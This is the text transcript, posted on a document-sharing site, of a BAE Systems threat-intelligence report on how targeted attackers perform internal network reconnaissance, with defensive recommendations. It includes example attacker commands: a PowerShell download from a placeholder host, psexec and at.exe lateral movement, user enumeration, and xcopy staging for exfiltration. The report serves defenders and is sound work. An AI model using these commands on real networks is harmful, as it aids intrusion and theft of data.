+ All Categories
Home > Technology > PIANOS: Protecting Information About Networks The Organisation and It's Systems

PIANOS: Protecting Information About Networks The Organisation and It's Systems

Date post: 15-Jan-2015
Category:
Upload: phil-huggins
View: 178 times
Download: 0 times
Share this document with a friend
Description:
A report I authored with colleagues on the Network Reconnaissance phase of a targeted attack explaining what is targeted, how the attackers operate and what controls help.
Popular Tags:
54
I BAE Systems Applied Intelligence PIANOS PROTECTING INFORMATION ABOUT NETWORKS, THE ORGANISATION AND ITS SYSTEMS CYBER PREPARE
Transcript
Page 1: PIANOS: Protecting Information About Networks The Organisation and It's Systems

I BAE Systems Applied Intelligence

PIANOSPROTECTING INFORMATION ABOUT NETWORKS, THE ORGANISATION AND ITS SYSTEMS

CYBER PREPARE

Page 2: PIANOS: Protecting Information About Networks The Organisation and It's Systems

II BAE Systems Applied Intelligence

The technical information describing your IT environment and the business information describing your organisation is very valuable to an attacker and is often collected during targeted attacks.

At Davos in January 2013 Ian Livingston, the then Chief Executive of BT, said: “There are two types of CEO – those that know their systems are being hacked and those that don’t”. He went on to say: “For pretty much any company I’ve come across, it should be one of the top three risks.”

These echoed comments from Robert S Mueller, III, Director of the FBI in February 2012 at the RSA Security Conference who said – “There are only two types of companies: those that have been hacked and those that will be. And even they are converging into one category: companies that have been hacked and will be hacked again”.

A critical change to the Cyber Security landscape in recent years is the growth of targeted attacks, undertaken by well resourced attackers with access to sophisticated tools. Targeted attacks are persistent and can be stealthy, using techniques which are designed to evade traditional defences. The attacker can then work quietly out of view to achieve their objectives, which often include finding and harvesting target information. Targeted attacks follow a multi-stage process which is often described using ‘kill chains’, a term that includes a chain of activities from the earliest probing of defences through to the stealing of data. In order to defend against targeted attacks organisations must deploy defences that address every stage of the kill chain.

The focus of this report is to provide an insight into the network reconnaissance activity undertaken by attackers following a successful infiltration of a target network. Critically our research finds that:

• Attackers predominantly use legitimate system tools to perform internal network reconnaissance, allowing them to hide and operate within normal network activity. It is difficult for an organisation to restrict the use of these network tools without hampering their legitimate and essential use by systems administrators.

• Attackers also exploit the use of common applications, many of which fulfil legitimate business requirements complicating an organisation’s ability to apply restrictions to the use of the programs.

• Attackers subvert existing programs running on victim computers both to hide their activities and to ensure they can return time and time again.

Based on our findings, this report contains guidance on particular controls, tactics and techniques that organisations can employ to slow and detect network reconnaissance activities.

This report also discusses the material, common to all IT infrastructures, that is often sought by attackers during network reconnaissance activities. Effective protection of this material can reduce the attacker’s ability to understand the victim environment, thereby impeding the progress of an attack.

“ There are two types of CEO, those that know their systems are being hacked – and those that don’t. For pretty much any company I’ve come across, it should be one of the top three risks”.Ian Livingston, former CEO, BT plc: World Economic Forum, Davos, January 2013.

EXECUTIVE SUMMARY

BAE Systems would like to acknowledge the help and support of CPNI in producing this document and the accompanying products.

Page 3: PIANOS: Protecting Information About Networks The Organisation and It's Systems

1 BAE Systems Applied Intelligence

CONTENTSEXECUTIVE SUMMARY II

1 INTRODUCTION 2

1.1 Background 2

1.2 Summary of Findings 4

2 INTRODUCTION TO NETWORK RECONNAISSANCE 6

2.1 The Kill Chain 7

2.2 Information Targeted by Network Reconnaissance 8

2.3 Emerging Targets 11

3 NETWORK RECONNAISSANCE OBJECTIVES 12

3.1 Identify key environment information 12

3.2 Download of additional tools to collect environment information 13

3.3 Elevate privileges to collect environment information 13

3.4 Lateral movement 14

3.5 Stage environment information for exfiltration 14

3.6 Network Reconnaissance Objectives dependencies 15

4 NETWORK RECONNAISSANCE CASE STUDIES 17

4.1 Case study 1: Attack group – CommentCrew 17

4.2 Case study 2: Reconnaissance on a compromised web server 22

4.3 Case study 3: Tools used during intrusions 27

5 CONTROLS, TACTICS AND TECHNIQUES 29

5.1 Categories of defensive capability 29

5.2 Attack & defence controls matrix 30

5.3 Controls, tactics & techniques – definitions 31

6 RECOMMENDATIONS 37

6.1 Critical countermeasures 37

6.2 Ideal countermeasures 42

7 CONCLUSION 49

7.1 Key Takeaway 49

8 BIBLIOGRAPHY 50

Page 4: PIANOS: Protecting Information About Networks The Organisation and It's Systems

2 BAE Systems Applied Intelligence

1.1 BACKGROUNDTargeted attacks are becoming more prevalent. Conducted by well-resourced attackers with access to sophisticated tools and techniques the aim of these attacks is often to steal information. Targeting means that the attackers select their targets carefully and deliberately to provide access to assets of value or to an influential network (or IT system); targeting also means that the attackers research the target in advance to explore the ‘attack surface’ looking for exploitable weaknesses.

All organisations should consider themselves under attack and take steps to increase the effectiveness of their defences, particularly those which mitigate the risks posed by targeted attacks.

Network defenders can often observe targeted attacks carrying out repeated attempts to complete the job they have been created to do and working to penetrate the desired target until they meet their objective. They are also different in what they target, typically seeking specific information about (or held by) an organisation.

Espionage groups readily make use of cyber-attacks in order to collect information of strategic, economic and political importance. Since the information they are seeking is often only available within select organisations, this means that these attackers target the same organisations repeatedly, with little concern regarding the cost of the operation. These attackers are able to dedicate more time to subverting the security controls in place to achieve their goals. Often the actions of actors in this space are driven by real world events, where a requirement has been issued to identify specific information held by a particular organisation. For example in the case of the attackers known as ‘DnsCalc’ whose attack on the New York Times was disclosed in January 2013, the attackers appeared to be motivated by articles the New York Times had written on the Chinese prime minister1.

“ There is a vast swathe of corporates who have valuable intellectual property, much more valuable than they understand, which is inadequately protected. They don’t even realise it has been stolen. They don’t even know they have been the subject of attack. They usually have to be told about it by a third party, most of them do not discover it for themselves. The level of awareness is nothing like it needs to be. This is a very, very serious state of affairs”The Rt Hon Baroness Neville-Jones, UK Government Special Representative to Business on Cyber Security, speech to the Global Strategy Forum, February 2012..

1 INTRODUCTION

Page 5: PIANOS: Protecting Information About Networks The Organisation and It's Systems

3 BAE Systems Applied Intelligence

Critically however, in order to achieve their goals attackers must understand the environment they are attacking, which means that regardless of the organisation targeted much of the information sought is the same. Attackers target information about the systems and networks they are attacking, and by defending this information organisations can hinder the actions of attackers.

The challenges facing businesses that arise from this threat can be summarised as follows:

• Threat: modern threat agents are more numerous, more motivated and more organised than we have seen previously. They can also operate at scale and with financial backing in a way not seen before.

• Fragility: The complexity of modern IT systems continues to increase year on year, as does our dependence on these systems. A single exploitable ‘point weakness’ anywhere in an enterprise can cause problems everywhere.

• Embrace and Reach: Modern IT systems embrace and manage an entire enterprise. They reach out to include suppliers, business partners and customers. Such holistic connectivity means that a problem can rapidly ‘de-localise’, causing problems for the entire market segment.

• Situational Awareness: The security picture, both inside and outside an organisation can change rapidly, sometimes within hours. Static, fixed security defences cannot respond to this real-world volatility.

• Resources: Security solutions designed for the current evolved threat scenario require careful and knowledgeable design. The qualified security practitioners who can design and maintain these are a scarce resource.

Cyber-attacks focus on the development and exploitation of advantage – either acquiring something valuable that can be exploited directly (e.g. sensitive or valuable information, credentials, etc.), or establishing a hold over a target that can be exploited later (e.g. to sustain on-going surveillance, to implant malicious software to shut down a network on command, etc.). Such attacks are designed to be stealthy, and to persist over time.

A good overview of the scale, targeting and persistence of such cyber-attacks can be found in a recent Mandiant report2.

Page 6: PIANOS: Protecting Information About Networks The Organisation and It's Systems

4 BAE Systems Applied Intelligence

1.2 SUMMARY OF FINDINGS

The focus of this analysis is to provide an insight into the network reconnaissance activity undertaken by attackers following a successful infiltration of a target network (i.e. the Lateral Access stage of the BAE Systems Kill Chain which we describe in Figure 2.

Our research finds that targeted attacks typically make use of legitimate system tools to prosecute their aims, and by doing so they disguise their internal network reconnaissance by hiding and operating within normal network activity. Attackers also exploit the use of computer programs, and in doing so they make use of computer programs and processes which fulfil legitimate business requirements, complicating an organisation’s ability to apply restrictions.

Based on these findings, this report contains guidance on particular controls, tactics and techniques that organisations can employ to impede successful network reconnaissance from taking place. A core sets of critical controls that all organisations should implement are listed below:

• Network Monitoring – In order for the other controls to be effective (particularly incident response) it is critical that high quality logs are kept and that security alerts are generated from an extensive deployment of sensors across the estate.

Such logs should be stored for extended periods. Both successful and unsuccessful connections should be logged, and we also recommend the use of host-based logging which enables the detection of new tools downloaded by the attacker and is a force multiplier for the network defender.

• Log Analysis – it is exceedingly difficult for an attacker to conduct network reconnaissance without their activity being recorded in log files on a well-configured system so by analysing system and network logs continuously organisations give themselves the best chance of detecting on-going attacks.

• Incident Response – a human is behind all attacks. Whilst no network defence is infallible our research finds that attacker activity cannot go unrecorded. When suspicious activity is identified, having a timely incident response capability which works at a faster pace than the attacker is key, enabling organisations to determine the root cause of the suspicious activity and stop it, minimising the damage an attacker can do.

• Threat Intelligence – as a target you are not alone. The extent of online attacks is now of such a scale that campaigns of attacks occur across sectors and countries. It is likely the threat actors attacking you have attacked someone else and their behaviours and characteristics recorded and shared. Threat Intelligence is a technique that includes the collection, analysis and sharing of attacker technical and behavioural data from both within and outside of your organisation to determine the threat to your environment. This can provide the opportunity to predict attacks and in some cases spot attacks much earlier.

We also recommend that organisations should employ the following ‘Ideal’ controls in order to ensure the defences are adequate; however we recognise that the cost or associated business impact of these controls may mean some organisations are unable to employ these controls:

• Behavioural Analysis – essentially an extension of log analysis, organisations should implement behavioural analysis on log data collected on typical user activity. When undertaken over large data sets, behavioural analytics and big data techniques can detect subtle cyber threats such as concentration of system administrator tools on a regular user account, downloads of additional malware tools or identify communication channels with previously unknown command and control (C2) servers.

• Software Inventory – having a comprehensive inventory of known software and restricting users to running known software is the most effective of the ‘DENY’ controls mentioned in the report. Most actions conducted by attackers following infiltration have a pre-requisite that they have downloaded and executed an additional tool; preventing this can inhibit both the infection and the operation of malware.

• Network Diode – segregating valuable data from operational networks is an effective way to reduce the risk of high value data being lost. Organisations should use Network diode technology to make lateral movement difficult, as well as preventing access to critical data and systems. Implementation of Network diodes should be considered as part of a wider consideration of where the critical data is on enterprise networks, whether there is a business requirement for it to be in that location and which users require access to the data.

Page 7: PIANOS: Protecting Information About Networks The Organisation and It's Systems

5 BAE Systems Applied Intelligence

• Account Monitoring – by monitoring user accounts organisations enable themselves to detect both insiders and attackers attempting to impersonate legitimate users. This measure mitigates risks which could develop as a result of other weak areas such as dormant or inactive accounts which an attacker could exploit, and detects where an attacker has been able to escalate privileges.

• Privileged User Management – attackers will seek to escalate their privileges in order to gather sensitive technical data about the target environment. Increasing the basic security controls for legitimate privileged users, such as required password complexity, tighter and more frequent auditing of legitimate privileged accounts. Use of dedicated administrative accounts and break-glass procedures for access reduce the risk of the compromise of privileged accounts going unnoticed.

Page 8: PIANOS: Protecting Information About Networks The Organisation and It's Systems

6 BAE Systems Applied Intelligence

2 INTRODUCTION TO NETWORK RECONNAISSANCEThis report focusses on the last stages of the Kill Chain specifically on the protection of the internal network information which the espionage actors behind targeted attacks need access to prior to acting on their objectives. As such, we presuppose that the attacker has successfully executed the earlier stages of the attack (as defined in the explanation of the Kill Chain at Section 2.1). This report does not address measures to protect against the initial reconnaissance activity which takes place before a Targeted Attack commences.

The following sections provide real case studies detailing the actions of attackers in carrying out this latter stage activity, explaining what information is typically targeted along with the motivations for the attackers’ actions and how the results of these actions are used to achieve their objectives. Additionally, we provide recommendations which will guide organisations to improve their defences and hinder attackers.

In particular, this report looks at:

• Examples of system resources targeted by attackers during internal network reconnaissance.

• Tricks used by attackers to achieve persistence, move laterally and identify data of interest.

• Examples of tools used by attackers during internal network reconnaissance, why they use them and how they are used.

• Controls, tactics and techniques that organisations could employ to mitigate internal network reconnaissance techniques.

Page 9: PIANOS: Protecting Information About Networks The Organisation and It's Systems

7 BAE Systems Applied Intelligence

The Lockheed Martin Kill Chain

RECONNAISSANCE

WEAPONISATION

DELIVERY

EXPLOITATION

INSTALLATION

COMMAND & CONTROL

ACTIONS ON OBJECTIVES

The BAE Systems Kill Chain and the focus of this report

RECONNAISSANCE

WEAPONISATION

DELIVERY

EXPLOITATION

INSTALLATION

COMMAND & CONTROL

ACTIONS ON OBJECTIVES

RECONNAISSANCE

INFILTRATE

EXPLOIT

REMOTE ACCESS

PERSISTENCE

ESCALATE

LATERAL ACCESS

GATHER

EXFILTRATE

CLEAN UP

ENUMERATION OF INFORMATION SYSTEMS & RESOURCES

COMPROMISE OF ADDITIONAL SYSTEMS & IDENTITIES

Figure 1

Figure 2

BAE Systems has found the concept of the Kill Chain useful but has expanded the Kill Chain to better describe the types of targeted attacks we have seen and to better understand the various defensive controls, tactics and techniques that are effective during targeted attacks.

This report focuses on the enumeration activities of the attacker during the ‘Lateral Access’ stage of the BAE Systems Kill Chain, as highlighted in Figure 2, which is a subset of the Actions on Objectives stage of the Lockheed Martin Kill Chain.

BAE Systems Kill Chain Scope of this reportLockheed Martin Kill Chain

2.1 THE KILL CHAIN

The Lockheed Martin Kill Chain3 describes a model for cyber-attacks. The model consists of seven stages, as shown in Figure 1. Each stage can be studied in its own right, and organisations should seek to, as a minimum, address each stage of the Kill Chain.

Page 10: PIANOS: Protecting Information About Networks The Organisation and It's Systems

8 BAE Systems Applied Intelligence

At this stage attackers have established a command and control channel and are able to issue commands to victim machines – at this point attackers seek and exfiltrate data about the target organisation in order improve their understanding of the target environment. Subsequently this information will enable them to compromise additional systems and identities and ultimately pinpoint the high value data they wish to retrieve.

2.2 INFORMATION TARGETED BY NETWORK RECONNAISSANCE

From our experience handling targeted attacks a list of information commonly targeted during network reconnaissance has become evident. This includes a range of information about the target environment from lists of potential targets for lateral movement, to system information or user information to aid escalation or even the presence of security tooling that might put the attack at risk.

Sections 3 and 4 of this report discuss example techniques and case studies for how this information can be harvested. Primarily this is either through some form of enumeration using management tools and management network protocols directly or indirectly through the compromise of information repositories such as Configuration Management Databases or Software Inventories. Such technical information assets can often be overlooked by an information assurance function focused on protecting business information assets.

It is not possible to say which information is of most value to an attacker without the context of your organisations’ business and the attackers’ goals in targeting you.

2.2.1 TARGETED ENVIRONMENT INFORMATION

Targeted Information Attackers’ Goals

Lists of windows or UNIX network file shares.

Discovery of other technical or business information about the organisation as well as potentially discovering the targeted business assets.

Full directory listings for network file shares.

Discovery of other technical or business information about the organisation as well as potentially discovering the targeted business assets.

Identification of the Domain Controller server/s.

Discovery of users, systems, services and potentially passwords.

Identification of any database servers.

Discovery of targeted business assets.

Identification of management subnets or servers.

Discovery of additional systems to target and other routes to exfiltrate information.

Identification of servers keeping network logs.

Discovery of technical information describing the systems in your estate as well as the potential editing or deletion of records that may expose the attackers actions.

Lists of devices (and their types) on the estate.

Discovery of additional systems to target.

Targeted Environment InformationTable 1

(Continued)

Page 11: PIANOS: Protecting Information About Networks The Organisation and It's Systems

9 BAE Systems Applied Intelligence

External IP addresses for devices on the network (if applicable).

Discovery of additional systems to target and other routes to exfiltrate information.

Internal IP address ranges for devices on the network.

Discovery of additional systems to target.

Proxy settings used to connect to the internet.

Discovery of routes to exfiltrate information.

Credentials for VPN services, e-mail services & any other services that can be accessed remotely.

Discovery of routes to exfiltrate information.

URLs for intranet pages, and technology used within those pages.

Discovery of other technical or business information about the organisation as well as potentially discovering the targeted business assets.

Lists of open ports for outbound connectivity.

Discovery of routes to exfiltrate information.

Targeted User InformationTable 2

2.2.2 TARGETED USER INFORMATION

Targeted Information Attackers’ Goals

List of usernames, associated security groups or permissions.

Discovery of additional identities to target in order to move laterally onto additional systems or to escalate privileges.

Password hashes associated with those users.

Compromise of additional identities to target in order to move laterally onto additional systems or to escalate privileges.

Users currently logged in on machines (both locally and network-wide).

Discovery of additional identities to target in order to move laterally onto additional systems or to escalate privileges.

Page 12: PIANOS: Protecting Information About Networks The Organisation and It's Systems

10 BAE Systems Applied Intelligence

2.2.3 TARGETED SYSTEM INFORMATION

Targeted Information Attackers’ Goals

Lists of services and applications running both on the current machine and the wider network.

Discovery of potential vectors of attack to move laterally onto additional systems or to escalate privileges on the local machine.

Versions of services and applications running on the current machine and the wider network.

Discovery of potential vulnerabilities to move laterally onto additional systems or to escalate privileges on the local machine.

Anti-virus vendors in use across the estate.

Evasion of tools that may expose the attackers actions.

Other security products in use across the estate.

Evasion of tools that may expose the attackers actions.

Targeted System Information

Targeted Other Information

Table 3

Table 4

2.2.4 TARGETED OTHER INFORMATION

Targeted Information Attackers’ Goals

Administrative account lists and shared passwords.

Discovery of additional high-value identities to target in order to move laterally onto additional systems or to escalate privileges.

Backup files containing much of the information described above.

Discovery of other technical or business information about the organisation as well as potentially discovering the targeted business assets.

Intranet pages or presentations containing organisation charts identifying high-value individuals to target.

Discovery of additional high-value identities to target in order to move laterally onto additional systems or to escalate privileges.

Page 13: PIANOS: Protecting Information About Networks The Organisation and It's Systems

11 BAE Systems Applied Intelligence

Emerging TargetsTable 5

Targeted Information Attackers’ Goals

Configuration Management Databases (CMDB).

Discovery of technical information regarding the location, purpose and configuration of key systems.

Network Directories (LDAP, Active Directory).

Discovery of users, groups with attractive permissions and discovery of systems. Some ability to map the organisational structure of the targeted organisation.

Software Inventories. Discovery of systems and detailed information regarding the software deployed including version information.

Patch Management Tools. Discovery of systems and detailed information regarding the software deployed including version information and the existence of unpatched systems across the estate.

Service Management Desks. Discovery of key systems as well as visibility of incident response processes and activities.

Network Operations Centres (NOCs) dashboards.

Discovery of key systems including extensive and current network maps.

Log Repositories. Discovery of key systems, of software deployed and versions, identification of systems with well-configured or poorly-configured logging.

Backup Archives. Discovery of key systems, recovery of targeted data as well as recovery of user account details and credentials.

2.3 EMERGING TARGETS

The targeted information described in Section 2.2 represents the common network reconnaissance targets we have observed. To date these have been successful and low risk for most attackers.

Increasingly organisations are investing in highly useful and valuable technical data repositories such as those listed in the table below

As these sorts of repositories become more common, and importantly, more accurate and complete they will increasingly become attractive targets for attackers. Compromising these repositories will enable the attacker to rely on a less ‘noisy’ technique for network reconnaissance. This is less likely to trip security sensors across the environment than the indiscriminate scanning that is currently often conducted with impunity during network reconnaissance.

Consequently, it is important to consider both the protection of these repositories from unauthorised access and also the security monitoring of these repositories as cyber ‘canaries’ for targeted attacks.

Page 14: PIANOS: Protecting Information About Networks The Organisation and It's Systems

12 BAE Systems Applied Intelligence

3 NETWORK RECONNAISSANCE OBJECTIVESNetwork reconnaissance refers to the activities of an attacker during the enumeration phase of the lateral movement stage of the BAE Systems Kill Chain. Malware used by cyber espionage operators often has limited automated functionality when compared with malware, such as ZeuS, designed to steal banking credentials. Instead, malware used in espionage is often designed such that the attacker will be effectively operating a remote shell on the victims’ machine, removing the requirement for many capabilities present in commercial malware. Attackers use the remote shell to obtain sensitive data/information. This requires network reconnaissance as they are after specific information which is difficult to identify automatically, and such information may not be on the first infected machine. In addition to this, espionage malware is typically:

• Difficult to detect using signatures; because it is often recently written, meaning there is no chance for Anti-Virus (AV) solutions to have discovered the relevant signatures.

• Light weight; making it difficult to detect using basic heuristics.

This section of the report provides an overview of the attackers’ objectives. We have categorised the possible objectives an attacker might have once they have gained remote shell access to a victim machine.

The network reconnaissance performed by an attacker is aligned to the objectives the attacker is required to achieve. Section 3.1– 3.5 shows an overview of the objectives, motivations and tools used to achieve them. Section 4 provides case studies, going into detail on methods observed being used by real attackers, providing logs from the attacks where possible.

3.1 IDENTIFY KEY ENVIRONMENT INFORMATION

There are many reasons attackers are interested in building up a network diagram of the target organisation, these include:

• To identify applications that can be subverted later on in the same attack or in future attacks.

• To identify anti-virus providers in use, such that malware used in future attacks can be checked against the anti-virus product before being launched.

• To check versions of applications running across the network that may be vulnerable, such that in future attacks they can be exploited.

• To identify users that exist in the organisation, and where they sit on the network – such that in the future more tailored spearphishing attacks can be launched.

• To identify the structure of the network so that, next time an attack is attempted, less time is spent identifying what each network share is for.

• To identify privileged users (such as Administrators, and Asset Management users), such that their accounts can be targeted in future attacks.

Page 15: PIANOS: Protecting Information About Networks The Organisation and It's Systems

13 BAE Systems Applied Intelligence

3.1.1 EXAMPLE TOOLS/METHODSOne of the best tools for this is to use the freeware GUI based tool ‘ShareENUM’. ShareENUM provides the capability to enumerate all print and file shares on the domain including their security settings. Further features of the tool include:

• Use of inbuilt windows functionality to identify network shares – such as the ‘net view’ command.

• Use of the SysInternals tool ‘psloggedon’ – this tool allows attackers to identify users logged onto a particular share. When used the tool looks like this:

psloggedon.exe \\HOSTNAME

This command can be used to identify the relationship between a device and a user, which can be used to target machines owned by important individuals e.g. company director, system admin. It can also be used to ensure that the attacker does not log onto a machine at the same time as a user who is already logged on – to avoid detection.

• Identify applications running – this can be done using the Windows command Tasklist or the SysInternals tool ‘pslist’, both of which list processes running – each process being tied to an application. By building up a list of applications running attackers can seek to identify processes they can subvert, as well as key information for future attacks such as which anti-virus provider is in use at that particular organisation.

3.2 DOWNLOAD OF ADDITIONAL TOOLS TO COLLECT ENVIRONMENT INFORMATION

It is easier for the attacker to conduct network reconnaissance activity with the aid of additional tools. Attackers are often observed downloading legitimate tools such as components of the SysInternals suite to conduct network reconnaissance as well as malware tools such as password dumping software.

3.2.1 EXAMPLE TOOLS/METHODSThe attacker tool set is usually downloaded using the initial file created using the exploit, and therefore in most cases no additional tools are required for this.

This objective can also be completed by using inbuilt windows functionality, using Windows PowerShell, for example:

(new-object System.Net.WebClient) .DownloadFile(‘http://blah.com/file.txt’, ‘C:\tmp\file.txt’)

3.3 ELEVATE PRIVILEGES TO COLLECT ENVIRONMENT INFORMATION

Depending on the security controls on the victim network and the access levels of the user who unknowingly executed the malware, this objective may not be necessary. This is because if the initial malware is executed with administrator privileges then the attacker will not be required to elevate their privileges any further. Furthermore, if poor security controls are in place it might be the case that it is not necessary to have administrator privileges, as most functionality may be available to all users regardless of their role.

There are two types of elevating privileges the attacker is interested in:

1. Elevating privileges on the infected local machine to gain the ability to execute existing or additional tools to enumerate information locally

2. Elevating or changing privileges on the network to gain access to new network shares which the current account does not allow, to gain access to key servers within the estate e.g. the Domain Controller, log servers, database servers… etc and to pivot internally to other machines in the estate. In order to elevate or change privileges on the network it is likely that they already have elevated privileges on the infected local machine.

Page 16: PIANOS: Protecting Information About Networks The Organisation and It's Systems

14 BAE Systems Applied Intelligence

3.3.1 EXAMPLE TOOLS/METHODS• Identifying administrator users and dumping password hashes of those users. An example of the sequence of

commands that might be used to do this can be seen in section 4.1.7.

• Further exploiting currently running applications and processes using increased privileges. For example, those shown in Section 4.1.4.

• Binary planting – this is the practice of replacing executables used by legitimate services or applications with malicious files.

3.4 LATERAL MOVEMENT

There are two key motivations for attackers to attempt lateral movement once they have infected a victim machine.

The first is to ensure that the attack is not short lived; attackers use remote access gained in order to infect other machines. Often, different malware variants are used, such that if one variant is discovered the others remain undetected.

The second is in pursuit of the files that they are targeting. It may be necessary to move to alternative parts of the network to access specific files.

3.4.1 EXAMPLE TOOLS/METHODS• Windows Task Scheduler (at.exe) – for example:

at \\10.1.1.1 10:00 a.bat

• Extensive use of SysInternals suite, particularly using psexec – for example:

psexec \\MACHINE-A ipconfig /all

This command can be used both to move laterally on the network, as well as to perform reconnaissance on machines which are not yet infected.

3.5 STAGE ENVIRONMENT INFORMATION FOR EXFILTRATION

This objective is not always part of attacks, as having gathered useful environment information they will seek to recover that information to review and analyse the contents. Sometimes the attackers will exfiltrate files as and when they find them, however, on several occasions we have observed attackers collecting the files they wish to exfiltrate in a central location.

Often in doing so they hide files for exfiltration in benign locations on the disk or in a new one created by the attacker using xcopy or SysInternals tools. This is so that they can:

• Exfiltrate files in one transaction to avoid the risk of being removed from the network before the mission is complete.

• Encrypt/Zip files to ensure any solution checking content leaving the network is unable to scan the files for keywords (Data Loss Prevention alerts). Smaller files are also less likely to cause alerts in intrusion detection systems or network monitoring solutions.

3.5.1 EXAMPLE TOOLS/METHODS• Use of WINRAR or custom variants there-of.

Page 17: PIANOS: Protecting Information About Networks The Organisation and It's Systems

15 BAE Systems Applied Intelligence

• Use of xcopy, for example:

xcopy C:\Documents and Settings\Docs\ C:\Windows\System32\Help\

Xcopy is sometimes used instead of the ‘copy’ function as xcopy has a large array of options which attackers find useful, such as maintaining a consistent creation timestamp for a file which has been copied.

• The attackers often make use of existing compression tools installed on the OS; these have included Makecab.exe, the default utility for making Microsoft cabinet files, as well as 7zip.

3.6 NETWORK RECONNAISSANCE OBJECTIVES DEPENDENCIES

It should be noted that the Network Reconnaissance Objectives are inter-dependent; the relationships between them are highlighted below. While we are concerned with the harvesting and gathering of environmental information this often requires other objectives to be complete first.

3.6.1 IDENTIFY KEY ENVIRONMENT INFORMATIONPartially dependant on:

• Download of additional tools to collect environment information

• Elevating privileges to collect environment information

3.6.2 DOWNLOAD OF ADDITIONAL TOOLS TO COLLECT ENVIRONMENT INFORMATIONPartially dependant on:

• Elevating privileges to collect environment information

3.6.3 ELEVATING PRIVILEGES TO COLLECT ENVIRONMENT INFORMATION Partially dependant on:

• Download of additional tools to collect environment information

3.6.4 LATERAL MOVEMENT Partially dependant on:

• Download of additional tools to collect environment information

• Elevating privileges to collect environment information

• Identify key environment information

3.6.5 STAGE ENVIRONMENT INFORMATION FOR EXFILTRATIONDependant on:

• Download of additional tools to collect environment information

• Identify key environment information

Partially dependant on:

• Elevating privileges to collect environment information

• Lateral movement

Page 18: PIANOS: Protecting Information About Networks The Organisation and It's Systems

16 BAE Systems Applied Intelligence

Network Reconnaissance Objectives

Network Reconnaissance

Objectives

Identify key environment information

Download of additional tools to collect environment information

Elevate privileges to collect environment information

Lateral movement

Stage environment information for exfiltration

Identify key environment information

N/A Partially Dependant

Partially Dependant

Partially Dependant

N/A

Download of additional tools to collect environment information

N/A N/A Partially Dependant

N/A N/A

Elevate privileges to collect environment information

N/A Partially Dependant

N/A N/A N/A

Lateral movement

Partially Dependant

Partially Dependant

Partially Dependant

N/A N/A

Stage environment information for exfiltration

Dependant Dependant Partially Dependant

Partially Dependant

N/A

Network Reconnaissance Objective Inter-DependenceTable 6

Page 19: PIANOS: Protecting Information About Networks The Organisation and It's Systems

17 BAE Systems Applied Intelligence

4 NETWORK RECONNAISSANCE CASE STUDIES4.1 CASE STUDY 1: ATTACK GROUP – COMMENTCREW

The attack group commonly known as ‘CommentCrew’4 are infamous for using a technique for covert communications where they embed commands on legitimate webpages inside comment tags. In a variation of this method, our team identified them using a similar technique using images to send commands to victims. Machines running the group’s malware would poll a compromised legitimate website in order download a specific image and parse out the hidden commands that had been added to the end of the file.

In early 2012, BAE Systems Threat Intelligence team came across a series of websites where the attackers were using this particular technique. We monitored and deciphered the commands and were able to read them in plain text. The instructions issued to the malware revealed dozens of high-profile organisations. Over the following eight months we collected over ten thousand commands and gained a first-hand view of internal network reconnaissance techniques used by this group. We monitored the channels by retrieving the pages periodically and as a result some of the logs are incomplete.

The following sections show some example commands issued by the attacker to victim machines.

4.1.1 IDENTIFYING USER ACCOUNT INFORMATIONIn order to move laterally, or to escalate privileges, the attackers are often seen attempting to gain details on user accounts on the network. It’s important to note the syntax used in the commands displayed in the figures in Section 4. First a timestamp is given, and then the number of the command in the session, followed by a unique identifier for the particular session opened.

An excerpt from C2 logsFigure 3

Page 20: PIANOS: Protecting Information About Networks The Organisation and It's Systems

18 BAE Systems Applied Intelligence

In this instance net.exe is used to inspect user accounts on the domain. Attackers try to identify users who have been active on the machine, their security group and information such as whether password resets are compulsory for that account in order to determine which accounts to target the credentials of. In this instance the attacker quickly began to look beyond the initial workstation, running the net group command to find the names of the domain controllers on the network. This is because domain controllers are the core of the network; accounts and permissions across the estate are governed by this server.

4.1.2 DOWNLOAD OF LEGITIMATE TOOLS FOR USE IN THE ATTACKIn order to blend in with normal users the attackers are often seen using legitimate applications to carry out tasks. By using legitimate tools rather than building the capability into the malware they are able to make the malware lightweight. This means it is less likely to be detected using host-based heuristics.

Commands showing the attacker activating the session, navigating to a previously created directory and downloading several tools to help with internal network reconnaissance

Figure 4

In this case we can view the first few commands in a given session to an infected machine in lines 2036-2039. These commands break the syntax of the Windows command line, and would not make sense to run normally, however as these parameters are sent to the malware it knows to interpret them differently.

These commands break the syntax of the Windows command line, and are parameters sent to the malware to download the files. The malware knows to interpret these commands differently, parses the command and interprets the URL as an instruction to download the resource and save it to the given file-path.

Additionally these commands give an idea of the tools that attackers have identified as necessary for their internal reconnaissance. Both ‘pslist’ and ‘pskill’ are legitimate copies of Microsoft SysInternals tools, which the attacker is saving locally as ‘psl.exe’ and ‘psk.exe’ presumably, due to personal preference. ‘Pslist’ allows you to view detailed information about processes on the machine, and ‘pskill’ terminates processes by name or process ID. In combination, these tools are useful for attackers as they allow them to identify processes running and kill them. For example this can be used to disable security products.

4.1.3 RECONNAISSANCE FOR TARGETED INFORMATIONWe observed the attacker performing directory listings of all drives on the local machine, saving them to a file and uploading the file to a remote server. This allows them to identify files of interest and search the file listings for key directories or project names related to their objectives. Filenames can reveal where commercial relationships exist, for example sometimes we have observed the attackers searching for Non-Disclosure Agreement (NDA) documents, the presence of which would indicate a commercial relationship between two organisations.

Often when attackers begin their search of the infected asset they will perform directory listings on all of the drives available. It is believed that the review of information retrieved may be carried out by a different component of the group than the operator. The file listing is saved to a .dat file which is later uploaded to a server compromised by the attacker.

Page 21: PIANOS: Protecting Information About Networks The Organisation and It's Systems

19 BAE Systems Applied Intelligence

In this case we also see the attacker specifying the search conditions to include anything with the term ‘keesee’ in it. KEESEE is a type of encryption often used to protect sensitive and classified material5. It is likely that in this case the attackers’ mission was to uncover information about this particular encryption algorithm.

Example commands of the attacker running file listings on a victim machine

Commands showing the attacker looking for information on the process running as ‘NiAiServ.exe’

Commands showing the attacker retrieving the file and uploading it to a remote server

Figure 5

Figure 6

Figure 7

4.1.4 USE OF EXISTING SOFTWARE OR APPLICATIONS TO ACHIEVE PERSISTENCEWe have observed many instances of CommentCrew abusing existing software and services in order to achieve persistence, and as a means to navigate the network.

The following set of commands takes place mid-way through an active session. This shows the attacker searching through running services, identifying potential entries which could be manipulated and later modifying them into running malicious code.

The attacker first lists services running, before performing basic operations on a particular service and then looking for more detailed information about the process running the file “NiAiServ.exe”. This executable forms part of the product NetInstall’6 produced by Enteo which is used for asset management.

Page 22: PIANOS: Protecting Information About Networks The Organisation and It's Systems

20 BAE Systems Applied Intelligence

Commands showing the attacker nullifying an element of Symantec AVFigure 8

